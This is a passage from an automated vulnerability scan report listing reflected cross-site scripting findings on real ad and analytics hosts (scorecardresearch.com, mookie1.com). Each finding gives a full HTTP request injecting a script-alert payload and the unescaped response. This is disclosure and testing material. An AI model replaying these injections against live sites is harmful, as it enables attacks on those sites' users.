Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"37d6c50<script>alert(1)</script>bbe75eec2e7", c4:"16565", c5:"28159", c6:"", c10:"174266", c15:"", c16:"", r:""});



4.40. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 35e59<script>alert(1)</script>27cddba7723 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=1656535e59<script>alert(1)</script>27cddba7723&c5=28159&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:42:59 GMT
Date: Tue, 19 Jul 2011 20:42:59 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
,f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"1656535e59<script>alert(1)</script>27cddba7723", c5:"28159", c6:"", c10:"174266", c15:"", c16:"", r:""});



4.41. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 23c60<script>alert(1)</script>d682f2287ec was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=16565&c5=2815923c60<script>alert(1)</script>d682f2287ec&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:43:00 GMT
Date: Tue, 19 Jul 2011 20:43:00 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"16565", c5:"2815923c60<script>alert(1)</script>d682f2287ec", c6:"", c10:"174266", c15:"", c16:"", r:""});



4.42. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e35be<script>alert(1)</script>6f8f21388b6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=16565&c5=28159&c6=e35be<script>alert(1)</script>6f8f21388b6&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:43:01 GMT
Date: Tue, 19 Jul 2011 20:43:01 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"16565", c5:"28159", c6:"e35be<script>alert(1)</script>6f8f21388b6", c10:"174266", c15:"", c16:"", r:""});



4.43. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73600"><script>alert(1)</script>cf1843363ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Ticketmaster73600"><script>alert(1)</script>cf1843363ea/LN/RTG_SX_NonSecure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Ticketmaster73600"><script>alert(1)</script>cf1843363ea/LN/RTG_SX_NonSecure/503274606/Bottom3/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.44. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1793"><script>alert(1)</script>21638686707 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Ticketmaster/LNd1793"><script>alert(1)</script>21638686707/RTG_SX_NonSecure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Ticketmaster/LNd1793"><script>alert(1)</script>21638686707/RTG_SX_NonSecure/1619248060/Bottom3/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.45. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14063"><script>alert(1)</script>f058737c3cd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom314063"><script>alert(1)</script>f058737c3cd HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 354
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Ticketmaster/LN/RTG_SX_NonSecure/1162924129/Bottom314063"><script>alert(1)</script>f058737c3cd/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.46. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/172548/11408426983@x01

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a690"><script>alert(1)</script>6745bff7060 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster7a690"><script>alert(1)</script>6745bff7060/172548/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 339
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster7a690"><script>alert(1)</script>6745bff7060/172548/1739368303/x01/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.47. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/172548/11408426983@x01

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99dac"><script>alert(1)</script>68532547002 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/17254899dac"><script>alert(1)</script>68532547002/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/17254899dac"><script>alert(1)</script>68532547002/L12/79868710/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/726348573830334f56626741436d4566?x" target="_blank">
...[SNIP]...

4.48. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/172548/11408426983@x01

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a7f5"><script>alert(1)</script>9242a2f4cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/172548/11408426983@x011a7f5"><script>alert(1)</script>9242a2f4cf? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/172548/2069848632/x011a7f5"><script>alert(1)</script>9242a2f4cf/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.49. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/AirCanadaCentre/11408426983@x01

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9911a"><script>alert(1)</script>84e16a5c31d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster9911a"><script>alert(1)</script>84e16a5c31d/AirCanadaCentre/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 347
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster9911a"><script>alert(1)</script>84e16a5c31d/AirCanadaCentre/874685307/x01/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.50. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/AirCanadaCentre/11408426983@x01

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bff1"><script>alert(1)</script>63db032276e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/AirCanadaCentre8bff1"><script>alert(1)</script>63db032276e/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
